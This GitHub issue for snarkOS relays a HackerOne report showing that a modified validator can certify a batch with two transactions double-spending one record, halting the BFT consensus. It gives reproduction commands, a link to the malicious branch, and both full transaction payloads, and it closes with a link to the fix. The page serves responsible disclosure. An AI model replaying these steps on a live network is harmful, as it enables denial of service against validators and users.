search

AleoNet / snarkOS

A Decentralized Operating System for ZK Applications
http://snarkos.org
Apache License 2.0
4.36k stars 2.63k forks source link

An invalid BatchPropose will be certificated and the related BatchCertificate can break the BFT and take down the network #2880

Closed feezybabee closed 10 months ago

feezybabee commented 11 months ago

https://hackerone.com/reports/2242904

Summary

An invalid BatchPropose can break the BFT and take down the network

Steps To Reproduce:

1.Use the normal snarkos to start 3 validators

nohup cargo run --release start --validator --dev 0 --nodisplay >> validator_0.log &
nohup cargo run --release start --validator --dev 1 --nodisplay >> validator_1.log &
nohup cargo run --release start --validator --dev 2 --nodisplay >> validator_2.log &

2.Use the modified snarkos to start 1 malicious node.The malicious node will not check the transaction is valid or not, so it will pack a transaction which's input record has already been spent.

Branch: https://github.com/ghostant-1017/snarkOS/tree/test/uncheck

nohup cargo run --release start --validator --dev 3 --nodisplay >> validator_3.log &

3.We create two transactions which's input records is the same one, and we broadcast it to the malicious node.

Like below:

{"type":"execute","id":"at188k3j7t0ynjthjuucvtyenxyx90mapz5rsy0kzl2clz08aylt59qj5p6z7","execution":{"transitions":[{"id":"au1anrm7vke9f4tc9rz8t7tczcvqjqjdhkgrgq7n0qyrl62mv5nhvpq4nxq4u","program":"credits.aleo","function":"transfer_private","inputs":[{"type":"record","id":"5693775116352996503339045333470096099188630940442547874218385091461139188787field","tag":"704943545647908889897852223503115016833231923888418137294614521925498202542field"},{"type":"private","id":"1952801256471349338355674683097412915881579139554226374210233227729522719923field","value":"ciphertext1qgqqz97mqrlf397p62z3fcskxgdjnuxqxslztm5uepsj2m5xjsa35ypuxkk8vl8pu2wp9cvhfrfjlzl4gp3y5fpf7q2jgsjmh7s97fzdqyh4t7tf"},{"type":"private","id":"6330923336000535578943777648534041420507488513940715361689663415429156445021field","value":"ciphertext1qyqryp6hp5fngrdg2sxwdhsh59r5c4qcgjdmhvn4edjkl2pxymmwqygaxjxh5"}],"outputs":[{"type":"record","id":"1036188174537079548470111986500324576458075397411863248185985614522828118375field","checksum":"3741215244083463247886626633191558063183233018176825882419716019034989952177field","value":"record1qyqspv4mlzgut0dtx8zpgjvmwacwyqhka5k5vukhvt3txh593qs6uygjqyxx66trwfhkxun9v35hguerqqpqzqzxx0mv04pxr2w6wluclmth6er2z802j6yspjzce8zaj05ptd52qdjcml5ufhu2vescatfjcrdhnz0lk9t4x78jz5j7ny4yrmtmmukqs0lpsuh"},{"type":"record","id":"3712312147575312153487299940934502088864935332458827982712938714995948739245field","checksum":"4596201754801597092115994602980777434350423833549994347839885073786845514701field","value":"record1qyqspr6e04kmzx7qf7vw8gw7ynjlyp2jp26q32tgrg2lvjkgfgk6zlgwqyxx66trwfhkxun9v35hguerqqpqzqzu7rlqtlmdwnj7qpcxs8apgzvnk40xl7e4n88gdk06389ekf8qpxdz4a8tzjr0s6v99c8xmnfguu8ty09dzpf06egxyphenau2xgfq6fh29ak"}],"tpk":"8211707299810051430599677482135853301079390997121838729797291773541511639202group","tcm":"2043453353674354578032371758361804144578016472642203324084380650932254970524field"}],"global_state_root":"sr18qzkj0flx5xwc3nvqdffygt2mle3rn5runj4q6jnmy6w3gpc2s8qqt468f","proof":"proof1qypqqqqqqqqqqqqpqqqqqqqqqqqqzqqqqqqqqqqqptrpttk0q84dk3d427q8x63xnl4gjpyt0dnzutzuwmdk7xekht0dyyje2ynkwrn48u9vuhc5g27gp72kt09cew3cujhqtwv9eryhj05w80m4xmf5jyv3pjv6dp27qryu34yaeaglmj2lal2gcll8sx90qqq73jej0kyaxcqgzvkr6255n32ln8mjns4vyh060dxp3jxujt3ngl7qlp05v4vhqag3vl90rdygpacqaetz9we4e8xrvrwznjy3wdgnj0a4dsg5yh6e95pzh7ngdrj9a58fndajwe0y3ld6fjrv9d2wsz0gq62jt0n722f756pn06ulsu4q78v346peg3ar4p2c2qdxxyvlf3pdwft9asqj9cq36jnkyhtz5p2nsxgmuwscp9z8nsy2lv7uqg5807cvnkxltq2fhke7kxywmw4vld2uvun3huf3dc09ns3f990sdynm9qytrc2c32432zzu744xac2tgp6vf4kn2w952p9zzkxsmuz8hm2hesl6kw89xt6439fn0f2244vxdkq0tfptlkp6wz0pw2mhtpt6awump0ysqdgdascq47vyu9sq64vj9ea38c28g5auz38zt6p6e4fzz9gpz7aug4cs0sx5ezlz8xwj7v0xm34yrfksf0fxyxqrteq0pvm6thnnhre7ga5urnzycxt39shh7t8spz7hje7cdngyl2ff5f5sj4f0p2a4tc7u46lpp8cqs2t3k2anr0ev6jt6q9lvqu2uk95wjhdqka27sqgzm0p79t94szacp54vcmg77shdn8w6cgk65zssxyw2t7h3h425vh4wch0tx7xlyxk4vycwmz4g8qr3zdyl6xl7mc05k9jjkqvm0evrkdzsesn43qk5g7qshr2vtdmvrdk7eyy5gfyw64hr4dmm0qgjtqqpe8dxsj5784u7d7gks7x3drw84hx0xzprw469q3q90k73hdt02rgsvxft8hzjtjpgjtlt6kjnzdcq7v4gxrrsh4k6g4paj49r4mcvh4ju5dzwwurl3c3qt9c7ugdg9y89y3g24xgl2hpxk48yuqh5s76vzedy9zltgur6qv65wjse3qjsvzlp43mnygsp2trrdle0hamk90myq5z5kv23ff25gvgfp3rkhgknq54ecauhjfdrpk5xdzk6zf5jdzu530ku7c2ytlge94ajrcxddwrshrnz2tzshgc4gjn6hs35gcwx6t5yym8tv7ru566c6gvrkwcaegc9a55wrpf4r9t5ll0lpegnwpatuhljwk93afxl4nvjnkgjpd2sg587n5smk230cnu0zmvtza0f2xnvn3vmcvmnlaxktx5cc2rk8j6e5qe20xteruz893zgyczjhesnyahlmyhfmxfh63szezrvyv650gvfqq7ptgsgqwcdnadpxjnh0chnmj8vuy99076mt9uy4dferk4gz8lszeujynsg45df4j52vkfnzwvmnjam4l3m0f50skcnrecwxu2plespcpgkwf66324l7lp4zvnc856kg3jpptpwrjds24zrqyw725942ugaym4zzly6sqm8lck9yayjs9dltz3ans6h5pf65354tdxj5h6g6q83t58jsas0pedxp4ru6vfdp4qcdrvp856jq8e6j6w68knyp5g8qhx99uu6njly6yuyu57pcd8ff6neg9fqy2ka5gskyfhp2vlknakqhygghf9camleww5ag776ugxltsgumu58ma9s5jnuj2uvgga2z9cz3fjkym8zuaw8ns048tznp6zzmeffklwuh9m5634a9ca5vj4psvr9h48zmlnaalym7hppm4hpfwhg5j6p46m4jnm9x50wmlu7qvxtgpj526cwyu806a7k47jw2jsnckxun6dcr82uq084h08kpkkhjsnxppp3veqt2rhrkgefyzx46xagvy5q2g6jumexy7t67c575grry0h3zqcqqqqqqqqqqrkvjqsqmajed7s3cc50dz3auwm3t6vuzqn72975pwy0rkghak06x9gwvt7a7q0dv66sk92wqkvhkqqqvq4xacfpq5raqacap3p33mdm5ffd9jyct7u09sfs4um36crjd08h94mtw73ekaw64mcdgwlkpfuszqw8l07wsv9ssez70w94crhr6qhj362gp4er23cxyzgsredx5uwqppuqh4460ettruqzvcfeevzkczcv0nrdv3de0mzk582he4m93rqrujjj3yazzg2kyev8survkn6xgqqqwck6j8"},"fee":{"transition":{"id":"au15gcc8843pm5pd50r4vhfd232h8futl5ehlx4gc4r3d3lfhsxvuysrfnqpz","program":"credits.aleo","function":"fee_public","inputs":[{"type":"public","id":"4057197456177134166304773213401621121386897695702004443467605047952430933975field","value":"2210u64"},{"type":"public","id":"5800438749245883177672810260201373662549236896193499790783513514440500868271field","value":"100u64"},{"type":"public","id":"3228060948814981199265722781995747287301502911288478352402196297342506204534field","value":"4287163819273088695916473020670567185080453672300626488619279262849433337177field"}],"outputs":[{"type":"future","id":"8249974751543984618966701024284048171828794845918303299853545519685039332155field","value":"{\n  program_id: credits.aleo,\n  function_name: fee_public,\n  arguments: [\n    aleo1rhgdu77hgyqd3xjj8ucu3jj9r2krwz6mnzyd80gncr5fxcwlh5rsvzp9px,\n    2310u64\n  ]\n}"}],"tpk":"6207615761040833377696998142482173464214334759681161528988111772798332749760group","tcm":"8312379479940061385079182132081765536229967734262043615276788456124355558570field"},"global_state_root":"sr1u6z68uv7nwasxjnd0sje87ql0gww40va5zs82vxhg70zm8wh9v9qnd54jv","proof":"proof1qyqsqqqqqqqqqqqpqqqqqqqqqqqgs06pfjpc8usj3nu02hvc237p035tysq209e0en3t5se52kfs72mdv9eaj38vezwxjrxcpxdcpgypqxeq7np2rvkmu2vpdk6qngay2r4w8p8r4j60pp48rvkfzqeq4gmpvh4g4lzsc23yxv26lp96rzkshqdwda7l5dnzsdvyfu9num6h423dcx3dj3zs0fdxch9at2fuku3vxf4zxppla6aa69qxdj52p2cf7wqrnat96n77ydm8nl87242qnncuhscd494azdlu7wtczsqqpa6ejz7uuvaav6rdy73uxlqucmrj2cgqu0q6rwvla9k69lg37m00kkz8lgra6gz54maug276hlrl05kwpwwcj8vyuwukrtr68nefrh0l55ncqggtmxlhtuz02d7gmw66zy78j20fqu3n9hewrz5xqyz6f4p7tls4ymyrgtkg8gcks5xvk08sktptsy39uxng3nemksp9nl98mm4mlq50n8m5jmstz9vt0seq3qughz5ul5kpndf3pw6gp8m5gfkh37tcnq8stcfr4244sfxqd03wcqwzma9se6suqppjk9hnd4z9mtzd6sz42md6xv0s6v5xxxc2ldwgz44uxqqw46dxvnw8vad2lcff02j03c5c6x7f6dg3d3evgll50ju57lal3reffxs7sg34l8hef8z49x76jscqkzlmjgapum9gt4gkusspme44rymavke38d6mjqk9j8n3gtl98u8tsvgy38tzhyx7pl5lwkvsfymy57qakdkm2a6humjgrdj9j2wdupvux0yj6j9yguphwqz27vagwvv46u0fc3frjvh8jsy7f53gqqxjqd0v7tj2hm5nk46yndxq6hhy9nx2qcnqmdqstuqn3k5erqn9c57s3nc0c2gd3dv2y72r785fhe3lewga4sl5z9wzgfvh70n5mgd7jrg9fnn2tjewp42ykuq2ex2xltp4pue4je4nyu4crlyn5ur9a49a5ux38fy2u5w6fpcrtk5828umyf4k7lkyl4ah726yw8kyzgghst68jzk4knn0j6y4n036t0q2hdunz9nfnxejpefkcvzr73hqgxe6z9yupxn67y2a6kajhwvs5ca2g6msj7m4xm9hytp8jaaphq2ynkq6hjasnfpnc8gvhex88ue2fz70566c283rvylmc6m0ntrs4fx3dggvdmqrqvqqqqqqqqqqqumsask38ga60y55nhp6pq87xwe496fedyddh5sgk7cfv69v6cvgdtlfvsuh4uwqkqqtqwgrz9puqqqtw7mmjp5cf93yuyqzy4sn86fmkcmwuc3m2wyhf5mg7v4aa65laxr0cz9qn69k7gw3yxstde3776vpq9t7fp439xeydkzr0jrtzdqy9qzhcmr8hqdtpfj5ynfmut0z9gds7nels4hsedghdsadsnzlvx30796cf9g4r8wtdvrtvw2h9kjeue4d4e38crt6cuwpnwthx7pk68ylqyqqcvawlx"}}
{"type":"execute","id":"at1kptz04u2klvr24je5tf9warv9tnhqhphvkawh2aujg6dw3khjszszkvuvg","execution":{"transitions":[{"id":"au192y0uts4yelhh780ys389zgmal433sq3r2ufcs0rkpv73t9g9v9snz7crw","program":"credits.aleo","function":"transfer_private","inputs":[{"type":"record","id":"5693775116352996503339045333470096099188630940442547874218385091461139188787field","tag":"704943545647908889897852223503115016833231923888418137294614521925498202542field"},{"type":"private","id":"5161104982177057294261082097104900685322363519627722569471890130287351231395field","value":"ciphertext1qgqdmp3dztrsjdmeemjpctkq4k99e6xsplhy7qqa5wvsfnuansn8qqwy9t2yzuutnaks38y9lf69txjceu47u69tn837pqu87pxepdftqqqkyn6x"},{"type":"private","id":"1340096847520724601220218819499278791228818545131828344862405090979760308237field","value":"ciphertext1qyqvz5059nqua8zx6avpe4h2wgrgjk8hvj2j9ljlua03qz3s4ng5jqgk72vmk"}],"outputs":[{"type":"record","id":"7311675982347805611331877706125791604730659913525782732275312816686683327123field","checksum":"4646381080966389541096505119876397939576139347304957517178156231692084508040field","value":"record1qyqsp2gywxku8dmqctngn0rzw88fpy5wm6gl5edvhhzzjl7ur2y06sc2qyxx66trwfhkxun9v35hguerqqpqzqqmlu2933a3ecfn07nm0kdpfagg0e54768mg0fuda7e6vmr3vv5q89ux5ck8s46afyh79sfgsmvszkppae77cec8ky4glcfsnsqfk9qkv77w36"},{"type":"record","id":"404365250388991787861970725395168212726758189357328831786715877149635493447field","checksum":"4724492167844028901778097622602568690702781737041162121814004860120470872956field","value":"record1qyqsp2qsvm4xtqnqtr5uglstcjvcfzkn7wx5lm02rmzmn2xangftnug3qyxx66trwfhkxun9v35hguerqqpqzqpwkulrs9ytzk6zr4av5mtkhpkrep6a8mr3hf2gh8z6m4a6zd26qxy3agd3gvxhtguw3gnu8n05d3azm68sn8u5g58qljpsqc2x8qeqgmfr9r3"}],"tpk":"3465829821022769262354078875933530426901336606439719316957189602884093928146group","tcm":"3106220420169137142556993690112244431579861155499533913550750927899740287787field"}],"global_state_root":"sr1gg9xf8w2khkvr67tnyzwlztv88355el36jkmq6mrqxzuvskjavzstnyat3","proof":"proof1qypqqqqqqqqqqqqpqqqqqqqqqqqqzqqqqqqqqqqqyt2w2arecadjse2sawtyrx83ha23999ldh4yq64d92n0c47wjjdmdzlgqjy9du6yf8xz6vfqkqkgz2tn49vaew2fean27drztasc2u7nh695zunagdjvuk3acwsn4ekslswwesvl74ncu96j7rsxxm22syqnkedna36slpce907ev09a9wl8hfs7g7pzx7ghdh3w463qp4f3zpjvn6nmvtcugrlr8u2n0j0rkmcqcd4efgv6g4mht8nrmetuth547sueudvyr8fqh8c9s707j6kk4upnj9ae4auhef0fmn2n57pja9wcqunq0uwz6wzp9ka0yrgwj6m2gq6va6tmyl4js90saf4arxf0yzclwqq9lj53qrdw92nmxvtswdsgqqllrnygm9j9mza77xjgz43vy2evgjk6m8zf8f43de90vkr78kdu4yxevv3ky2jlqpxkszghaj6h2qpuelq82246ynafhtmg957xlg73tm4xtl94pm7xd4rzje0n46mulsy26c7ag68dpcrmfevwkp5fw5qd0pkc7l4tu6htkjvg4pnrnr8fd2zegzqhj2yg4j4syedqmgzchyd7l9f0359pp4py8slpa2argkcqnq4mr2a4e0xu4wlzsnx454lhh8w28nu66pjfj25ftyk4zexlnav6cf400f6yd84f4ex9m6jsqxxczerg6dmexp399lzy4qax03eecyp44vz7x9gp5y33df6x04tkq29f2u9yt5xhxk2j75jhmam72m78qq5f02jkwpwq29uk6039ncz92q5pzrskqwc6msg9dlxn83y72mjml8zxkk6rmtlszqrmsvhjats40qyzwwugfs065wxz8z29ec36vf406cum0hxp6mehl28gh7cvz4splsr7fm4j767ua2tplwwwjmv8p5qwxw4u3ycr9smm6fnmaqxvrs90wla3hc53nxzvnxjlr9shteqjy5pslhmzl0mgp5f9vulxn22r52uq8hweeghxhjt5lekg54x6vrfmsj8jxss7dx4fl3n87w4aj5ztrv9d5rawy9v7zvknt4pkpq55ad28ex8hgh6zxmsyxwv42zpc5umrzzm05uc436z2syg837fzhe7f5xjerqsan0kz97470lj2u439tmqnqzwldlg2r0nc3qlqmjplz06vg8s6upukynh303409vzejqarg6gsd2ct2rwy0252yxh47y48dxrh2c5uqzr3ngl9zvmac7vwlgl3k2cdyfzvcwhhqses3k97834waztxjc7rfpexf4glj0q6k647sqmcuvzk3ex7evt6427n8w9qfuy9xnt3ttgejtcrd89gdgse43lqcdhn5yh38nyza477vrr86zs9u52r4sstntue4jtsy4nkmn2p6uhs5qv6q43rvvv2u55hgh4wpaup3d8qq8wkzvejdcxs6y6ta4l94nvr3gypzh3jdjke99fd9sqt0mp08h220g4upy8a56a2jxj20cu0vdagz0g080p5hvlcwd33hw382uf4z3s7fleuxjd74k7e7ypenr2hvzt7ugyfml6080y8zk348wzjdr0j7a6pfcuvw2nr2vx9mzdajhzv8fvx7q2yjvwnsr4fv3yru0vx733sz3nlqqd3fk0rzqlfcygvg4w4x9etq97jp3lkv9k22wgzmuddpy0v6r2rnqf64ztyv6kryqa3caf49yqs3q9yf5wtwffysaz4k78j075h0f86qvmd5eqhgtm2cv5sxpulwts8ajpkn5qujhxywtr0u6zqcgzpwu9elupsfu9zwz43gwtv9z599vqkzhuvg2lfjuwmm2pvgxm7x7mljg6wm90rmlkgrp9y75hdlawrsqs4gfynwteq8lgt8y2smz4ag04mkan23k462aght5fmfgz5lzappwhm3g2ujctsysmr8rg6trv6cl8v74e78fhrjwy3zu5eu4xepg9sjqcqqqqqqqqqqrc527qls5k6h32f7qvpfyvwj6pc24caslxvlhtg4yf0l3w4cqqpz5kag6huyr34h6pqc0qdh0q8lqqqsww5lens5055yu59cje3lqz9xyfnjfs5qw6janvdruc9rtun2dcxxwmstv8h36vyts3l00z6txzgqq2r0hvu6axgxydykf9cschxteukxwxd99e947p7r8x2q44n5ph0pegk55w8rw6l0advvw0nwsgy4faz3smq0lc0t4m4pcgdcm73yvgz39gxdrtam5ce9hgmjsgnf7ufmqgq2q3ldq"},"fee":{"transition":{"id":"au1tcquf54ul69gpg36rhzvr54zyget8fdmas0tmw7v3msdplyfqgqss6q67x","program":"credits.aleo","function":"fee_public","inputs":[{"type":"public","id":"764188915425529833772054256927174196177666525697561739879384704775345874894field","value":"2210u64"},{"type":"public","id":"4795188676928235538309805038286139105350446019775264761913018565217356099157field","value":"100u64"},{"type":"public","id":"3284929129238158181222052723373469916739510189775122119885650571442002095462field","value":"5177355447174310717337157018740262343354489598017571099071448834419515557336field"}],"outputs":[{"type":"future","id":"2682930141150917461378561290498828640030327776879551923960031130822900721507field","value":"{\n  program_id: credits.aleo,\n  function_name: fee_public,\n  arguments: [\n    aleo1rhgdu77hgyqd3xjj8ucu3jj9r2krwz6mnzyd80gncr5fxcwlh5rsvzp9px,\n    2310u64\n  ]\n}"}],"tpk":"6521698554172186727401845419080322730501235397331943833639458776486489974744group","tcm":"2730688155070844320517735580328120189310083227777576859595533779190419020892field"},"global_state_root":"sr16r9j4l83s38wpswhxfy8lq50s9jala40afsf00hrfahruyywxq8sptqy4x","proof":"proof1qyqsqqqqqqqqqqqpqqqqqqqqqqqprx5e7txzh7crt0txnss8eje7sensp4vhl0nqllakwf2fkuc0gyjehvz9ehnxays4tsq6w5zsj3gqq9gvkng6v43my0dy5hpkfu72c2n4rhksf35mztxm82a4hcvgnhugn3cqqfawfhu3ehwmqjtmnfjxrqpuhamtwuxjl3j5svvave0q0zzm7y3wq77c7czsr2q2r627d6pmx5mcttqg0u9x866y6hflqdk6fzq2fehg2x59xyndrmq37cktd2vuz0nhfsl863egs52q0dm5lztle4vfh0jrza0gk2rsljm6a3eqknqpmww07nsk94aavhhmgl5xnj6eu4lk3mdus3g3jc03fc2rdc7us2xrfnjx9v6chzxr8huxyxk25ehgpew7p2qnj5hg8zn5jyk774kg26ttkk7ck8xr64ll4qwus03ets6f0l2nrwuafc6ytcdyknynsws6qygsyxenpcvwwj98c7v7m29puvmm5y39mh0hg4lcefd8c263v7cqv6va0pntv63tls0k7rzemcy6fqdty7zenjdgcq3hj5w93h7tk0atwdqrmt4meharmsj3lz7ufuavlwp83trqxxt83ppzv3t70d3ctzq3m4j29v99226mcd7mv8d585qj3ymvg6zw5utnthdzjcmswpzww7mqksf60sed4us73ekgcadc9zqpmthnf5srm2rz75p73zv30vgskh5u879svs2h4eefmqv4wt6ung8dhzelg5n3duw6l49g29ngzjhwxf8cjt8xgjn4f0978znzyxsjgyycsdjlpws7jlhe6nfeq4kqjqq3a2z22f0azcfqksn85d2gqm2yqf4u80rzam20v0cz4gneqmad85vqkjv3t6w8qcut6wzgm02amqvq30jemnkqclsfldzc8p84pej4sr826j59vqk47vehlxx7l2cj28g9kp9pl0rh598g883v7wndhp3nffk2gw97u0pqr4yk3rw2ev5xfs8h4uc8m7nlh2xgmwy94xupw6n9kemly3hqpyaw65wac7j37xuszzquphfes6xs68tel4sfql3mk6e2cghv5zyf9dc7puysycafkv48zrpq7c4ywgg270zldeusre9lqm7l9rlz3x2rgsq3wksa95p8cmqscgymu2dfvnuydwq9g00hyz9jcfl85x928yppqrdnr8v2qc9943g3qvqqqqqqqqqqqgf35m0h69l78w30m92m2f69hgrdp7hwj4wdh22nnsak9j6su3wgsm4txtgrea4pplsrhfq7kukaqqqryvemmhunw4qxmhmr3kp9p005f0ahjqfx40hraz7wj0qfmnxs36de6cyaguhmagqtu4vd9uj5t6qqqyww8v8n8qpp0jwfavglckkuxhn5jye8taw8vm7ez4m9fxspn2fqjf3cww03vg7gamq9y8cvndln76r0pknt0h7ewwc02lpsjfxf6tenh7f2r6l5xv79txrlyhs9w0grsyqqyzj2uw"}}

4.Check the logs and we will see: https://cdn.jsdelivr.net/gh/ghostant-1017/img@main/img/image-20231107100525204.png

Proof-of-Concept (PoC)

  1. When the node receive the BatchPropose or BatchCertificate, it will not check the transmissions are valid or not.
  2. The node will update_dag-> commit_leader_certificate -> order_dag_with_dfs

https://github.com/AleoHQ/snarkOS/blob/3f845c1205d3e5e1731e33099d88970410e5b003/node/bft/src/bft.rs#L476

  1. Next consensus_sender.tx_consensus_subdag.send((subdag, transmissions, callback_sender)).await?; will call process_bft_subdag -> try_advance_to_next_block -> check_next_block , since the block is invalid, the check will fail.

https://github.com/AleoHQ/snarkOS/blob/3f845c1205d3e5e1731e33099d88970410e5b003/node/bft/src/bft.rs#L538

  1. The code logic will jump to step1 again.

Additional Materials

Truncated logs: https://raw.githubusercontent.com/ghostant-1017/logs/master/validator_0_2023_11_07_02_35_00_2023_11_07_02_36_00.log

Impact

An invalid BatchPropose will be certificated and the related BatchCertificate can break the BFT and take down the network

vicsn commented 11 months ago

Note that this attack works when two transactions are sent in different batches. But we should also cover the case where the duplicate inputs are used within the same batch.

feezybabee commented 10 months ago

Addressed in this PR: https://github.com/AleoHQ/snarkVM/pull/2229